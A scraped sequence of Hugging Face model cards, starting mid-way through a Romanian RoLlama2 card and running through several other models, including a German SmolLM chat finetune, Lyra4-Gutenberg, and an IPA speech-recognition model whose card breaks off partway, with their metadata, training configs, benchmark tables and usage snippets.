- name: 1-shot
type: bleu
value: 8.61
- name: 3-shot
type: bleu
value: 12.25
- name: 5-shot
type: bleu
value: 14.73
- task:
type: text-generation
dataset:
name: WMT_RO-EN
type: WMT_RO-EN
metrics:
- name: 0-shot
type: bleu
value: 1.29
- name: 1-shot
type: bleu
value: 10.78
- name: 3-shot
type: bleu
value: 16.82
- name: 5-shot
type: bleu
value: 23.24
- task:
type: text-generation
dataset:
name: XQuAD_EM
type: XQuAD_EM
metrics:
- name: 0-shot
type: exact_match
value: 5.29
- name: 1-shot
type: exact_match
value: 33.95
- name: 3-shot
type: exact_match
value: 39.24
- name: 5-shot
type: exact_match
value: 42.10
- task:
type: text-generation
dataset:
name: XQuAD_F1
type: XQuAD_F1
metrics:
- name: 0-shot
type: f1
value: 16.17
- name: 1-shot
type: f1
value: 51.84
- name: 3-shot
type: f1
value: 58.82
- name: 5-shot
type: f1
value: 61.29
- task:
type: text-generation
dataset:
name: STS_Spearman
type: STS_Spearman
metrics:
- name: 1-shot
type: spearman
value: -1.74
- name: 3-shot
type: spearman
value: 15.47
- name: 5-shot
type: spearman
value: 9.93
- task:
type: text-generation
dataset:
name: STS_Pearson
type: STS_Pearson
metrics:
- name: 1-shot
type: pearson
value: -1.40
- name: 3-shot
type: pearson
value: 15.00
- name: 5-shot
type: pearson
value: 10.33
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
RoLlama2 is a family of pretrained and fine-tuned generative text models for Romanian. This is the repository for the **foundational 7B model**. Links to other models can be found at the bottom of this page.
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
OpenLLM-Ro represents the first open-source effort to build an LLM specialized for Romanian. OpenLLM-Ro has developed and publicly released a collection of Romanian LLMs, both as foundational models and as instruct and chat variants.
- **Developed by:** OpenLLM-Ro
<!-- - **Funded by [optional]:** [More Information Needed] -->
<!-- - **Shared by [optional]:** [More Information Needed] -->
<!-- - **Model type:** [More Information Needed] -->
- **Language(s):** Romanian
- **License:** Llama2 Community License Agreement
- **Continual pretrained from model:** [Llama-2-7b](https://huggingface.co/meta-llama/Llama-2-7b-hf)
- **Trained using:** [CulturaX](https://huggingface.co/datasets/uonlp/CulturaX)
### Model Sources
<!-- Provide the basic links for the model. -->
- **Repository:** https://github.com/OpenLLM-Ro/llama-recipes
- **Paper:** https://arxiv.org/abs/2406.18266
## Intended Use
### Intended Use Cases
RoLlama2 is intended for research use in Romanian. Base models can be adapted for a variety of natural language tasks, while instruction- and chat-tuned models are intended for assistant-like chat.
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
Use in any manner that violates the license or any applicable laws or regulations, and use in languages other than Romanian.
## How to Get Started with the Model
Use the code below to get started with the model.
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14")
model = AutoModelForCausalLM.from_pretrained("OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14")
input_text = "Mihai Eminescu a fost "
input_ids = tokenizer(input_text, return_tensors="pt")
outputs = model.generate(**input_ids, max_new_tokens=100)
print(tokenizer.decode(outputs[0]))
```
## Academic Benchmarks
<table>
<tbody>
<tr>
<td><strong>Model</strong></td>
<td><strong><center>Average</center></strong></td>
<td><strong><center>ARC</center></strong></td>
<td><strong><center>MMLU</center></strong></td>
<td><strong><center>Winogrande</center></strong></td>
<td><strong><center>Hellaswag</center></strong></td>
<td><strong><center>GSM8k</center></strong></td>
<td><strong><center>TruthfulQA</center></strong></td>
</tr>
<tr>
<td>Llama-2-7b</td><td><center>37.04</center></td><td><center>36.05</center></td><td><center><strong>33.66</strong></center></td><td><center>57.56</center></td><td><center>48.00</center></td><td><center><strong>4.75</strong></center></td><td><center>42.22</center></td>
</tr>
<tr>
<td><em>RoLlama2-7b-Base-2024-05-14</em></td><td><center><em><strong>38.03</strong></em></center></td><td><center><em><strong>37.95</strong></em></center></td><td><center><em>27.22</em></center></td><td><center><em><strong>59.29</strong></em></center></td><td><center><em><strong>57.22</strong></em></center></td><td><center><em>2.53</em></center></td><td><center><em><strong>44.00</strong></em></center></td>
</tr>
</tbody>
</table>
## Downstream Tasks
<table>
<tbody>
<tr>
<td></td>
<td colspan="4"><center><strong>LaRoSeDa</strong></center></td>
<td colspan="4"><center><strong>WMT</strong></center></td>
</tr>
<tr>
<td></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
</tr>
<tr>
<td><strong>Model</strong></td>
<td><center><strong>Binary<br>(Macro F1)</strong></center></td>
<td><center><strong>Multiclass<br>(Macro F1)</strong></center></td>
<td><center><strong>Binary<br>(Macro F1)</strong></center></td>
<td><center><strong>Multiclass<br>(Macro F1)</strong></center></td>
<td><center><strong>EN-RO<br>(Bleu)</strong></center></td>
<td><center><strong>RO-EN<br>(Bleu)</strong></center></td>
<td><center><strong>EN-RO<br>(Bleu)</strong></center></td>
<td><center><strong>RO-EN<br>(Bleu)</strong></center></td>
</tr>
<tr>
<td>Llama-2-7b</td><td><center><strong>93.19</strong></center></td><td><center>54.11</center></td><td><center>98.43</center></td><td><center>87.22</center></td><td><center><strong>14.90</strong></center></td><td><center><strong>26.61</strong></center></td><td><center>24.95</center></td><td><center>39.09</center></td>
</tr>
<tr>
<td><em>RoLlama2-7b-Base-2024-05-14</em></td><td><center><em>83.25</em></center></td><td><center><em><strong>61.04</strong></em></center></td><td><center><em><strong>98.97</strong></em></center></td><td><center><em><strong>87.72</strong></em></center></td><td><center><em>10.01</em></center></td><td><center><em>13.03</em></center></td><td><center><em><strong>27.85</strong></em></center></td><td><center><em><strong>39.30</strong></em></center></td>
</tr>
</tbody>
</table>
<table>
<tbody>
<tr>
<td></td>
<td colspan="4"><center><strong>XQuAD</strong></center></td>
<td colspan="4"><center><strong>STS</strong></center></td>
</tr>
<tr>
<td></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
</tr>
<tr>
<td><strong>Model</strong></td>
<td><center><strong>(EM)</strong></center></td>
<td><center><strong>(F1)</strong></center></td>
<td><center><strong>(EM)</strong></center></td>
<td><center><strong>(F1)</strong></center></td>
<td><center><strong>(Spearman)</strong></center></td>
<td><center><strong>(Pearson)</strong></center></td>
<td><center><strong>(Spearman)</strong></center></td>
<td><center><strong>(Pearson)</strong></center></td>
</tr>
<tr>
<td>Llama-2-7b</td><td><center><strong>38.91</strong></center></td><td><center><strong>56.82</strong></center></td><td><center>65.46</center></td><td><center>79.42</center></td><td><center><strong>9.08</strong></center></td><td><center><strong>9.07</strong></center></td><td><center><strong>79.93</strong></center></td><td><center><strong>81.08</strong></center></td>
</tr>
<tr>
<td><em>RoLlama2-7b-Base-2024-05-14</em></td><td><center><em>30.15</em></center></td><td><center><em>47.03</em></center></td><td><center><em><strong>67.06</strong></em></center></td><td><center><em><strong>79.96</strong></em></center></td><td><center><em>7.89</em></center></td><td><center><em>7.98</em></center></td><td><center><em>71.75</em></center></td><td><center><em>71.99</em></center></td>
</tr>
</tbody>
</table>
## RoLlama2 Model Family
| Model | Link |
|--------------------|:--------:|
|RoLlama2-7b-Base-2024-05-14 | [link](https://huggingface.co/OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14) |
|RoLlama2-7b-Instruct-2024-05-14 | [link](https://huggingface.co/OpenLLM-Ro/RoLlama2-7b-Instruct-2024-05-14) |
|*RoLlama2-7b-Instruct-2024-10-09*| [link](https://huggingface.co/OpenLLM-Ro/RoLlama2-7b-Instruct-2024-10-09) |
|RoLlama2-7b-Instruct-DPO-2024-10-09| [link](https://huggingface.co/OpenLLM-Ro/RoLlama2-7b-Instruct-DPO-2024-10-09) |
## Citation
```
@misc{masala2024vorbecstiromanecsterecipetrain,
title={"Vorbe\c{s}ti Rom\^ane\c{s}te?" A Recipe to Train Powerful Romanian LLMs with English Instructions},
author={Mihai Masala and Denis C. Ilie-Ablachim and Alexandru Dima and Dragos Corlatescu and Miruna Zavelca and Ovio Olaru and Simina Terian-Dan and Andrei Terian-Dan and Marius Leordeanu and Horia Velicu and Marius Popescu and Mihai Dascalu and Traian Rebedea},
year={2024},
eprint={2406.18266},
archivePrefix={arXiv},
primaryClass={cs.CL},
url={https://arxiv.org/abs/2406.18266},
}
```
<!-- **APA:**
[More Information Needed] --> |
LemiSt/SmolLM-135M-instruct-de-merged | LemiSt | 2024-10-10T13:28:08Z | 132 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"axolotl",
"generated_from_trainer",
"conversational",
"de",
"base_model:LemiSt/SmolLM-135M-de",
"base_model:finetune:LemiSt/SmolLM-135M-de",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T11:07:01Z | ---
base_model: LemiSt/SmolLM-135M-de
library_name: transformers
license: apache-2.0
tags:
- axolotl
- generated_from_trainer
model-index:
- name: SmolLM-135M-instruct-de-merged
results:
- task:
type: text-generation
dataset:
name: openai/MMMLU
type: mmlu
metrics:
- name: MMMLU(DE_DE) (0-Shot)
type: accuracy
value: 25.57
verified: false
- task:
type: text-generation
dataset:
name: openai/MMMLU
type: mmlu
metrics:
- name: MMMLU(DE_DE) (5-Shot)
type: accuracy
value: 24.88
verified: false
- task:
type: text-generation
dataset:
name: alexandrainst/m_arc
type: arc
metrics:
- name: ARC Challenge (DE) (0-Shot)
type: accuracy
value: 24.29
verified: false
- task:
type: text-generation
dataset:
name: alexandrainst/m_arc
type: arc
metrics:
- name: ARC Challenge (DE) (5-Shot)
type: accuracy
value: 24.38
verified: false
- task:
type: text-generation
dataset:
name: deutsche-telekom/Ger-RAG-eval
type: Ger-RAG-eval
metrics:
- name: Task 1
type: accuracy
value: 25.2
verified: false
- name: Task 2
type: accuracy
value: 27.1
verified: false
- name: Task 3
type: accuracy
value: 50.9
verified: false
- name: Task 4
type: accuracy
value: 50.0
verified: false
language:
- de
pipeline_tag: text-generation
---
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
base_model: LemiSt/SmolLM-135M-de
model_type: LlamaForCausalLM
tokenizer_type: GPT2Tokenizer
load_in_8bit: false
load_in_4bit: true
strict: false
push_dataset_to_hub:
datasets:
- path: smollm_dataset.json
type: sharegpt
conversation: chatml
chat_template: chatml
default_system_prompt: "Du bist ein hilfreicher KI-Assistent."
dataset_prepared_path:
val_set_size: 0.05
adapter: qlora
lora_model_dir:
sequence_len: 2048
sample_packing: true
lora_r: 32
lora_alpha: 16
lora_dropout: 0.05
lora_target_modules:
lora_target_linear: true
lora_fan_in_fan_out:
wandb_project: smollm-135m-de-sft-qlora
wandb_entity:
wandb_watch:
wandb_name:
wandb_log_model:
output_dir: ./outputs/smollm-135m-sft-qlora-out
hub_model_id: LemiSt/SmolLM-135M-instruct-de
hub_strategy: end
gradient_accumulation_steps: 16
micro_batch_size: 2
num_epochs: 2
optimizer: adamw_bnb_8bit
torchdistx_path:
lr_scheduler: cosine
learning_rate: 0.003
train_on_inputs: false
group_by_length: false
bf16: true
fp16: false
tf32: false
gradient_checkpointing: true
early_stopping_patience:
resume_from_checkpoint:
local_rank:
logging_steps: 1
xformers_attention:
flash_attention: true
gptq_groupsize:
gptq_model_v1:
warmup_steps: 20
evals_per_epoch: 4
saves_per_epoch: 4
debug:
deepspeed:
weight_decay: 0.1
fsdp:
fsdp_config:
special_tokens:
bos_token: "<|endoftext|>"
eos_token: "<|endoftext|>"
unk_token: "<|endoftext|>"
```
</details><br>
# SmolLM-135M-instruct-de-merged
This model is a fine-tuned version of [LemiSt/SmolLM-135M-de](https://huggingface.co/LemiSt/SmolLM-135M-de) on an internal testing dataset with general chat examples.
It achieves the following results on the evaluation set:
- Loss: 0.7453
## Model description
For more information, see the model card of the [base model](https://huggingface.co/LemiSt/SmolLM-135M-de). This adapter was trained with QLoRA at rank 32 and alpha 16 on a dataset of around 200k German chat samples for two epochs.
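For reference, the QLoRA settings from the axolotl config above correspond roughly to the PEFT/bitsandbytes sketch below. The explicit target-module list is an assumption: `lora_target_linear: true` makes axolotl resolve all linear projections automatically.
```python
from peft import LoraConfig
from transformers import BitsAndBytesConfig

# 4-bit base model loading, as in "load_in_4bit: true" above.
bnb_config = BitsAndBytesConfig(load_in_4bit=True)

# LoRA adapter settings matching lora_r / lora_alpha / lora_dropout above.
lora_config = LoraConfig(
    r=32,
    lora_alpha=16,
    lora_dropout=0.05,
    bias="none",
    task_type="CAUSAL_LM",
    # Assumed module names; axolotl targets all linear layers automatically.
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
                    "gate_proj", "up_proj", "down_proj"],
)
```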
## Intended uses & limitations
This model is mainly intended for playing around with tiny chat models: while the output is generally intact German and the model somewhat follows instructions, it makes too many mistakes to be deployed in a real-world setting.
### Usage example
```python
import torch
from transformers import AutoTokenizer, AutoModelForCausalLM
checkpoint = "LemiSt/SmolLM-135M-instruct-de-merged"
tokenizer = AutoTokenizer.from_pretrained(checkpoint)
device = "cuda" if torch.cuda.is_available() else "cpu"
model = AutoModelForCausalLM.from_pretrained(checkpoint, device_map=device, torch_dtype=torch.bfloat16)
messages = [
{"role": "system", "content": "Du bist ein hilfreicher Assistent."},
{"role": "user", "content": "Was ist der Sinn des Lebens?"}
]
inputs = tokenizer.apply_chat_template(messages, tokenize=True, return_tensors="pt", add_generation_prompt=True).to(device)
outputs = model.generate(inputs, max_new_tokens=256, do_sample=True, temperature=0.4, top_p=0.9, repetition_penalty=1.1, top_k=512)
print(tokenizer.decode(outputs[0][inputs.shape[1]:], skip_special_tokens=True))
```
## Training and evaluation data
Internal dataset which was compiled for another experiment.
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.003
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 16
- total_train_batch_size: 32
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 20
- num_epochs: 2
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 1.6406 | 0.0005 | 1 | 1.6172 |
| 0.8219 | 0.2497 | 501 | 0.8901 |
| 0.8646 | 0.4995 | 1002 | 0.8370 |
| 0.8651 | 0.7492 | 1503 | 0.8052 |
| 0.7231 | 0.9989 | 2004 | 0.7827 |
| 0.7632 | 1.2468 | 2505 | 0.7673 |
| 0.7543 | 1.4967 | 3006 | 0.7536 |
| 0.7782 | 1.7466 | 3507 | 0.7469 |
| 0.6724 | 1.9966 | 4008 | 0.7453 |
### Framework versions
- PEFT 0.12.0
- Transformers 4.45.0.dev0
- Pytorch 2.3.1+cu121
- Datasets 2.21.0
- Tokenizers 0.19.1 |
QinLiuNLP/llama3-sudo-dpo-10epochs-forget10mixall-1sft-2fullpara-1e-5 | QinLiuNLP | 2024-10-10T13:24:54Z | 6 | 0 | null | [
"tensorboard",
"safetensors",
"llama",
"trl",
"dpo",
"generated_from_trainer",
"base_model:QinLiuNLP/llama3-sudo-5epochs-tofu_full_sft",
"base_model:finetune:QinLiuNLP/llama3-sudo-5epochs-tofu_full_sft",
"license:llama3",
"region:us"
] | null | 2024-10-09T05:13:50Z | ---
license: llama3
base_model: Jackie999/llama3-sudo-5epochs-tofu_full_sft
tags:
- trl
- dpo
- generated_from_trainer
model-index:
- name: llama3-sudo-dpo-10epochs-forget10mixall-1sft-2fullpara-1e-5
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# llama3-sudo-dpo-10epochs-forget10mixall-1sft-2fullpara-1e-5
This model is a fine-tuned version of [Jackie999/llama3-sudo-5epochs-tofu_full_sft](https://huggingface.co/Jackie999/llama3-sudo-5epochs-tofu_full_sft) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 4
- eval_batch_size: 8
- seed: 42
- distributed_type: multi-GPU
- num_devices: 4
- gradient_accumulation_steps: 4
- total_train_batch_size: 64
- total_eval_batch_size: 32
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
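For reference, a hedged sketch of how these settings would look as a TRL `DPOConfig` (a `TrainingArguments` subclass); the `output_dir` is an assumption, and the DPO beta and preference dataset are not documented in this card:
```python
from trl import DPOConfig

# Sketch only: mirrors the hyperparameters listed above.
dpo_args = DPOConfig(
    output_dir="llama3-sudo-dpo-10epochs-forget10mixall-1sft-2fullpara-1e-5",  # assumption
    learning_rate=1e-5,
    per_device_train_batch_size=4,
    per_device_eval_batch_size=8,
    gradient_accumulation_steps=4,  # 4 devices x 4 per device x 4 steps = 64 total
    lr_scheduler_type="cosine",
    warmup_ratio=0.1,
    num_train_epochs=10,
    seed=42,
)
```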
### Training results
### Framework versions
- Transformers 4.44.0
- Pytorch 2.1.2
- Datasets 3.0.0
- Tokenizers 0.19.1
|
PaulVialard/ppo-Huggy | PaulVialard | 2024-10-10T13:11:38Z | 6 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"Huggy",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-Huggy",
"region:us"
] | reinforcement-learning | 2024-10-10T12:52:33Z | ---
library_name: ml-agents
tags:
- Huggy
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-Huggy
---
# **ppo** Agent playing **Huggy**
This is a trained model of a **ppo** agent playing **Huggy**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how ML-Agents works:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**:
1. If the environment is part of the ML-Agents official environments, go to https://huggingface.co/unity
2. Find your model_id: PaulVialard/ppo-Huggy
3. Select your *.nn or *.onnx file
4. Click on Watch the agent play 👀
|
Jellon/Lyra4-Gutenberg-12B-4bpw | Jellon | 2024-10-10T13:11:28Z | 6 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"conversational",
"dataset:jondurbin/gutenberg-dpo-v0.1",
"base_model:Sao10K/MN-12B-Lyra-v4",
"base_model:quantized:Sao10K/MN-12B-Lyra-v4",
"license:cc-by-nc-4.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"exl2",
"region:us"
] | text-generation | 2024-10-10T12:48:41Z | ---
license: cc-by-nc-4.0
library_name: transformers
base_model:
- Sao10K/MN-12B-Lyra-v4
datasets:
- jondurbin/gutenberg-dpo-v0.1
model-index:
- name: Lyra4-Gutenberg-12B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: IFEval (0-Shot)
type: HuggingFaceH4/ifeval
args:
num_few_shot: 0
metrics:
- type: inst_level_strict_acc and prompt_level_strict_acc
value: 22.12
name: strict accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: BBH (3-Shot)
type: BBH
args:
num_few_shot: 3
metrics:
- type: acc_norm
value: 34.24
name: normalized accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MATH Lvl 5 (4-Shot)
type: hendrycks/competition_math
args:
num_few_shot: 4
metrics:
- type: exact_match
value: 11.71
name: exact match
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GPQA (0-shot)
type: Idavidrein/gpqa
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 9.17
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MuSR (0-shot)
type: TAUR-Lab/MuSR
args:
num_few_shot: 0
metrics:
- type: acc_norm
value: 11.97
name: acc_norm
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU-PRO (5-shot)
type: TIGER-Lab/MMLU-Pro
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 28.57
name: accuracy
source:
url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=nbeerbower/Lyra4-Gutenberg-12B
name: Open LLM Leaderboard
---
4bpw exl2 quant of: https://huggingface.co/nbeerbower/Lyra4-Gutenberg-12B
# Lyra4-Gutenberg-12B
[Sao10K/MN-12B-Lyra-v4](https://huggingface.co/Sao10K/MN-12B-Lyra-v4) finetuned on [jondurbin/gutenberg-dpo-v0.1](https://huggingface.co/datasets/jondurbin/gutenberg-dpo-v0.1).
### Method
Finetuned with ORPO on an RTX 3090 + 4060 Ti for 3 epochs.
[Fine-tune Llama 3 with ORPO](https://mlabonne.github.io/blog/posts/2024-04-19_Fine_tune_Llama_3_with_ORPO.html)
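A hedged sketch of what this recipe might look like with TRL's `ORPOTrainer` follows. It is illustrative only: the actual script, ORPO hyperparameters, and prompt formatting are not documented here, and depending on the TRL version the `tokenizer` argument may be named `processing_class`.
```python
from datasets import load_dataset
from transformers import AutoModelForCausalLM, AutoTokenizer
from trl import ORPOConfig, ORPOTrainer

model_name = "Sao10K/MN-12B-Lyra-v4"
model = AutoModelForCausalLM.from_pretrained(model_name)
tokenizer = AutoTokenizer.from_pretrained(model_name)

# gutenberg-dpo provides the prompt/chosen/rejected columns ORPOTrainer expects.
dataset = load_dataset("jondurbin/gutenberg-dpo-v0.1", split="train")

orpo_args = ORPOConfig(
    output_dir="Lyra4-Gutenberg-12B",  # assumption
    num_train_epochs=3,                # "3 epochs" per the Method section
)

trainer = ORPOTrainer(
    model=model,
    args=orpo_args,
    train_dataset=dataset,
    tokenizer=tokenizer,
)
trainer.train()
```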
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_nbeerbower__Lyra4-Gutenberg-12B)
| Metric |Value|
|-------------------|----:|
|Avg. |19.63|
|IFEval (0-Shot) |22.12|
|BBH (3-Shot) |34.24|
|MATH Lvl 5 (4-Shot)|11.71|
|GPQA (0-shot) | 9.17|
|MuSR (0-shot) |11.97|
|MMLU-PRO (5-shot) |28.57|
|
zhuqiang/repr100 | zhuqiang | 2024-10-10T13:04:50Z | 0 | 0 | peft | [
"peft",
"llama",
"region:us"
] | null | 2024-06-10T20:01:31Z | ---
library_name: peft
---
## Training procedure
### Framework versions
- PEFT 0.4.0
|
doktor47/zinemind_msft_v8 | doktor47 | 2024-10-10T13:01:40Z | 187 | 0 | transformers | [
"transformers",
"safetensors",
"detr",
"object-detection",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | object-detection | 2024-10-10T13:01:23Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
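In the absence of documented usage, a hedged sketch assuming this is a standard DETR object-detection checkpoint (as the `detr` and `object-detection` tags suggest); the input image path is a placeholder:
```python
from transformers import pipeline

# Untested sketch: assumes a standard DETR object-detection checkpoint.
detector = pipeline("object-detection", model="doktor47/zinemind_msft_v8")

# "example.jpg" is a placeholder input image path.
for detection in detector("example.jpg"):
    print(detection["label"], round(detection["score"], 3), detection["box"])
```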
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
davidbae/ipa-asr | davidbae | 2024-10-10T12:58:22Z | 105 | 0 | transformers | [
"transformers",
"safetensors",
"wav2vec2",
"automatic-speech-recognition",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-10-10T03:26:05Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
- **Version**: v1
- **Eval Loss**: 2.0914
- **Eval CER**: 0.3226
- **Dataset**: train-Announcer, test-Foreign40
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
